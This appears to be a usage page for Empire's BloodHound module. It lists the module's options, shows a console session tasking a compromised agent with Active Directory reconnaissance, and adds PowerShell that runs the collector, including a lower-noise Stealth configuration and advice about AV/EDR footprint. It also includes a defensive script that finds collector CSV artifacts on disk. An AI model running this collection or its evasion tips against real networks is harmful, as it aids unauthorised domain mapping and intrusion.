Invoke-BloodHound - Empire Module


This page contains detailed information about how to use the powershell/situational_awareness/network/bloodhound Empire module. For a list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Invoke-BloodHound
Module: powershell/situational_awareness/network/bloodhound
Source code [1]: empire/server/modules/powershell/situational_awareness/network/bloodhound.yaml
Source code [2]: empire/server/data/module_source/situational_awareness/network/BloodHound.ps1
MITRE ATT&CK: T1484
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: Yes

The bloodhound module executes BloodHound data collection.

This module runs in the background (Background: Yes) and is not OPSEC safe: the collector writes its CSV output to disk on the target (by default into the agent's current directory, see the CSVFolder option), and those files can be picked up by AV/EDR running on the system.

Note that the bloodhound module does not need administrative privileges to work properly, which means that a normal domain user can run this module.
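As an added illustration of the on-disk footprint mentioned above (this is example code, not part of the Empire module or of BloodHound), the following PowerShell looks through one or more folders for CSV files named like the legacy collector's outputs and reports their size, age and header row. The file names (group_membership, local_admins, sessions, trusts) and the "<CSVPrefix>_" separator are assumptions about the legacy BloodHound.ps1 ingestor, the function name Find-BloodHoundCsvArtifacts is ours, and the demo files are constructed so the check can be exercised without a real collection run.

```powershell
# Added example, not from Empire or BloodHound. File names and the "<prefix>_"
# separator are assumptions about the legacy BloodHound.ps1 CSV output; adjust
# the pattern to whatever your build actually writes.
function Find-BloodHoundCsvArtifacts {
    param(
        [Parameter(Mandatory)][string[]]$Path,
        [int]$NewerThanHours = 24
    )
    # group_membership / local_admins / sessions / trusts, optionally prefixed "<CSVPrefix>_"
    $pattern = '(^|_)(group_membership|local_admins|sessions|trusts)\.csv$'
    $cutoff  = (Get-Date).AddHours(-$NewerThanHours)

    foreach ($root in $Path) {
        Get-ChildItem -Path $root -Recurse -File -Filter '*.csv' -ErrorAction SilentlyContinue |
            Where-Object { $_.Name -match $pattern -and $_.LastWriteTime -ge $cutoff } |
            ForEach-Object {
                $lines = @(Get-Content -Path $_.FullName)
                [pscustomobject]@{
                    Path    = $_.FullName
                    Bytes   = $_.Length
                    Written = $_.LastWriteTime
                    Header  = if ($lines.Count -gt 0) { $lines[0] } else { '' }   # first line for a quick look
                    Rows    = [Math]::Max(0, $lines.Count - 1)                    # data rows after the header
                }
            }
    }
}

# Constructed demo data (not real collector output) so the function can be run offline.
$demo = Join-Path $env:TEMP 'bh-artifact-demo'
New-Item -ItemType Directory -Path $demo -Force | Out-Null
@('UserName,ComputerName,Weight',
  'jdoe@TESTLAB.LOCAL,WS01.TESTLAB.LOCAL,1') | Set-Content (Join-Path $demo 'op1_sessions.csv')
'Id,Amount' | Set-Content (Join-Path $demo 'invoice.csv')   # unrelated CSV, must not match

Find-BloodHoundCsvArtifacts -Path $demo | Format-Table -AutoSize
```

In a real triage, point -Path at the working directory of the suspect process, user profiles and temp folders, and widen -NewerThanHours to cover the suspected collection window; a match only says "a file with this name exists", so read the header row before treating it as collector output.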

Required Module Options


This is a list of options that are required by the bloodhound module:

Agent
Agent to run module on.

CollectionMethod
The method to collect data. 'Group', 'ComputerOnly', 'LocalGroup', 'GPOLocalGroup', 'Session', 'LoggedOn', 'Trusts', 'Stealth', or 'Default'.
Default value: Default.

Threads
The maximum concurrent threads to execute.
Default value: 20.

Throttle
The number of Cypher queries to queue up for neo4j RESTful API ingestion.
Default value: 1000.

Additional Module Options


This is a list of additional options that are supported by the bloodhound module:

CSVFolder
The CSV folder to use for output, defaults to the current folder location.
Default value: $(Get-Location).

CSVPrefix
A prefix for all CSV files.

ComputerADSpath
The LDAP source to search through for computers, e.g. "LDAP://OU=secret,DC=testlab,DC=local".

ComputerName
Array of one or more computers to enumerate.

Domain
The domain to use for the query, defaults to the current domain.

DomainController
Domain controller to reflect LDAP queries through.

GlobalCatalog
The global catalog location to resolve user memberships from.

SearchForest
Switch. Search all domains in the forest.

SkipGCDeconfliction
Switch. Skip global catalog enumeration for session deconfliction.

URI
The BloodHound neo4j URL location (http://host:port/).

UserADSPath
The LDAP source to search through for users/groups, e.g. "LDAP://OU=secret,DC=testlab,DC=local".

UserPass
The "user:password" for the BloodHound neo4j instance.
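As an added example (not code from the Empire project or from the BloodHound authors), the following PowerShell reproduces what the module does with the options above when run directly on a host: it dot-sources BloodHound.ps1 (the second source file listed in the overview; the local path is assumed), validates CollectionMethod against the list documented above, turns an option table that uses the module's option names into parameters for Invoke-BloodHound, passes the two Switch options as bare flags, and finally lists what was written to CSVFolder. The wrapper name Invoke-BloodHoundFromOptions, the staging folder, the domain, DC and OU values are placeholders, and the rule that Empire emits a switch only when its value is True is an assumption about how Empire builds the command line.

```powershell
# Added example, not part of Empire or BloodHound.ps1. Assumes BloodHound.ps1 is
# available locally at the path below (an assumption) and exposes Invoke-BloodHound
# with parameters named like the module options listed on this page.
. .\BloodHound.ps1

$AllowedMethods = 'Group','ComputerOnly','LocalGroup','GPOLocalGroup',
                  'Session','LoggedOn','Trusts','Stealth','Default'
$SwitchOptions  = 'SearchForest','SkipGCDeconfliction'

function Invoke-BloodHoundFromOptions {
    # $Options uses the same keys as the Empire module options; Agent is ignored here.
    param([Parameter(Mandatory)][hashtable]$Options)

    if ($Options.ContainsKey('CollectionMethod') -and
        $AllowedMethods -notcontains $Options.CollectionMethod) {
        throw "Unsupported CollectionMethod '$($Options.CollectionMethod)'; expected one of: $($AllowedMethods -join ', ')"
    }

    $params = @{}
    foreach ($entry in $Options.GetEnumerator()) {
        if ($entry.Key -eq 'Agent' -or [string]::IsNullOrEmpty("$($entry.Value)")) { continue }
        if ($SwitchOptions -contains $entry.Key) {
            # Switch options become bare flags, and only when set to True (assumed Empire behaviour)
            if ("$($entry.Value)" -eq 'True') { $params[$entry.Key] = $true }
            continue
        }
        $params[$entry.Key] = $entry.Value
    }
    Invoke-BloodHound @params
}

# 1) Same as the console walkthrough, but with an explicit output folder and prefix
#    so the CSVs do not land in whatever the agent's current directory happens to be.
$out = Join-Path $env:TEMP 'bh-out'            # assumed staging folder
New-Item -ItemType Directory -Path $out -Force | Out-Null
Invoke-BloodHoundFromOptions -Options @{
    CollectionMethod = 'Default'
    Threads          = 20
    Throttle         = 1000
    CSVFolder        = $out
    CSVPrefix        = 'op1'
}

# 2) Quieter, scoped run: Stealth method, LDAP queries pinned to one DC, computers
#    limited to one OU, global catalog session deconfliction skipped. Placeholder names.
Invoke-BloodHoundFromOptions -Options @{
    CollectionMethod    = 'Stealth'
    Domain              = 'testlab.local'
    DomainController    = 'dc01.testlab.local'
    ComputerADSpath     = 'LDAP://OU=secret,DC=testlab,DC=local'
    SkipGCDeconfliction = 'True'
    CSVFolder           = $out
    CSVPrefix           = 'op1-stealth'
}

# Review what was left on disk: this footprint is why the module is marked OPSEC unsafe.
Get-ChildItem -Path $out -Filter 'op1*.csv' | Select-Object Name, Length, LastWriteTime
```

Leaving URI and UserPass unset keeps the collector in CSV mode; setting both (http://host:port/ and "user:password") makes it push Cypher queries straight to a neo4j instance instead, which replaces the CSV files with outbound HTTP traffic from the target, a different but still visible footprint.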

Bloodhound Example Usage


Here's an example of how to use the bloodhound module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/situational_awareness/network/bloodhound

 Author       @harmj0y                                            
              @_wald0                                             
              @cptjesus                                           
 Background   True                                                
 Comments     https://bit.ly/getbloodhound                        
 Description  Execute BloodHound data collection.                 
 Language     powershell                                          
 Name         powershell/situational_awareness/network/bloodhound 
 NeedsAdmin   False                                               
 OpsecSafe    False                                               
 Techniques   http://attack.mitre.org/techniques/T1484            


,Record Options-------,-----------------,----------,-------------------------------------,
| Name                | Value           | Required | Description                         |
|---------------------|-----------------|----------|-------------------------------------|
| Agent               |                 | True     | Agent to run module on.             |
|---------------------|-----------------|----------|-------------------------------------|
| CSVFolder           | $(Get-Location) | False    | The CSV folder to use for output,   |
|                     |                 |          | defaults to the current folder      |
|                     |                 |          | location.                           |
|---------------------|-----------------|----------|-------------------------------------|
| CSVPrefix           |                 | False    | A prefix for all CSV files.         |
|---------------------|-----------------|----------|-------------------------------------|
| CollectionMethod    | Default         | True     | The method to collect data.         |
|                     |                 |          | 'Group', 'ComputerOnly',            |
|                     |                 |          | 'LocalGroup', 'GPOLocalGroup',      |
|                     |                 |          | 'Session', 'LoggedOn', 'Trusts,     |
|                     |                 |          | 'Stealth', or 'Default'.            |
|---------------------|-----------------|----------|-------------------------------------|
| ComputerADSpath     |                 | False    | The LDAP source to search through   |
|                     |                 |          | for computers, e.g. "LDAP://OU=secr |
|                     |                 |          | et,DC=testlab,DC=local"             |
|---------------------|-----------------|----------|-------------------------------------|
| ComputerName        |                 | False    | Array of one or more computers to   |
|                     |                 |          | enumerate                           |
|---------------------|-----------------|----------|-------------------------------------|
| Domain              |                 | False    | The domain to use for the query,    |
|                     |                 |          | defaults to the current domain.     |
|---------------------|-----------------|----------|-------------------------------------|
| DomainController    |                 | False    | Domain controller to reflect LDAP   |
|                     |                 |          | queries through.                    |
|---------------------|-----------------|----------|-------------------------------------|
| GlobalCatalog       |                 | False    | The global catalog location to      |
|                     |                 |          | resolve user memberships from.      |
|---------------------|-----------------|----------|-------------------------------------|
| SearchForest        |                 | False    | Switch. Search all domains in the   |
|                     |                 |          | forest.                             |
|---------------------|-----------------|----------|-------------------------------------|
| SkipGCDeconfliction |                 | False    | Switch. Skip global catalog         |
|                     |                 |          | enumeration for session             |
|                     |                 |          | deconfliction                       |
|---------------------|-----------------|----------|-------------------------------------|
| Threads             | 20              | True     | The maximum concurrent threads to   |
|                     |                 |          | execute.                            |
|---------------------|-----------------|----------|-------------------------------------|
| Throttle            | 1000            | True     | The number of cypher queries to     |
|                     |                 |          | queue up for neo4j RESTful API      |
|                     |                 |          | ingestion.                          |
|---------------------|-----------------|----------|-------------------------------------|
| URI                 |                 | False    | The BloodHound neo4j URL location   |
|                     |                 |          | (http://host:port/)                 |
|---------------------|-----------------|----------|-------------------------------------|
| UserADSPath         |                 | False    | The LDAP source to search through   |
|                     |                 |          | for users/groups, e.g. "LDAP://OU=s |
|                     |                 |          | ecret,DC=testlab,DC=local"          |
|---------------------|-----------------|----------|-------------------------------------|
| UserPass            |                 | False    | The "user:password" for the         |
|                     |                 |          | BloodHound neo4j instance           |
'---------------------'-----------------'----------'-------------------------------------'

(Empire: usemodule/powershell/situational_awareness/network/bloodhound) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/situational_awareness/network/bloodhound) > set CollectionMethod Default
[*] Set CollectionMethod to Default
(Empire: usemodule/powershell/situational_awareness/network/bloodhound) > set Threads 20
[*] Set Threads to 20
(Empire: usemodule/powershell/situational_awareness/network/bloodhound) > set Throttle 1000
[*] Set Throttle to 1000
(Empire: usemodule/powershell/situational_awareness/network/bloodhound) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come back from the agent.

Authors


@harmj0y, @_wald0, @cptjesus (as listed in the module's Author field)

References


https://bit.ly/getbloodhound (the module's Comments link, as shown in the console listing)

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.